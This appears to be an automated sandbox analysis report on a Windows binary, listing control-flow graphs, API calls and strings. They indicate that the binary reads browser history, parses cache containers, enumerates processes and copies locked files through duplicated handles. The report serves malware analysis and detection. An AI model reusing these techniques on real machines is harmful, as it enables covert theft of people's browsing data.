                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f ??3@YAXPAX@Z 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                    APIs
                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                    • memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                    • memcpy.MSVCRT ref: 0040E3EC
                                                                    • memcpy.MSVCRT ref: 0040E407
                                                                    • memcpy.MSVCRT ref: 0040E422
                                                                    • memcpy.MSVCRT ref: 0040E43D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                    • API String ID: 3073804840-2252543386
                                                                    • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                    • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                    • String ID:
                                                                    • API String ID: 3715365532-3916222277
                                                                    • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                    • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                    APIs
                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                    • memset.MSVCRT ref: 00413D7F
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                    • memset.MSVCRT ref: 00413E07
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                    • API String ID: 912665193-1740548384
                                                                    • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                    • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                    • String ID: bhv
                                                                    • API String ID: 327780389-2689659898
                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2941347001-70141382
                                                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                    • String ID: visited:
                                                                    • API String ID: 2470578098-1702587658
                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 ??3@YAXPAX@Z 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                    APIs
                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                    • API String ID: 3883404497-2982631422
                                                                    • Opcode ID: edbd84529ef28b733ccf9b4c221d4d7de735e56aa7ab74abb92493a4e91cfa25
                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                    • Opcode Fuzzy Hash: edbd84529ef28b733ccf9b4c221d4d7de735e56aa7ab74abb92493a4e91cfa25
                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                    • memcpy.MSVCRT ref: 0040B60D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                    • String ID: AE$BIN
                                                                    • API String ID: 1668488027-3931574542
                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                    • memset.MSVCRT ref: 0040BC75
                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                    • memcmp.MSVCRT ref: 0040BCD6
                                                                    • memcpy.MSVCRT ref: 0040BD2B
                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                    • String ID:
                                                                    • API String ID: 509814883-3916222277
                                                                    • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                    • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError ??3@YAXPAX@Z 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 ??3@YAXPAX@Z 845->850 846->845 850->830
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile$??3@ErrorLast
                                                                    • String ID: |A
                                                                    • API String ID: 1407640353-1717621600
                                                                    • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                    • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
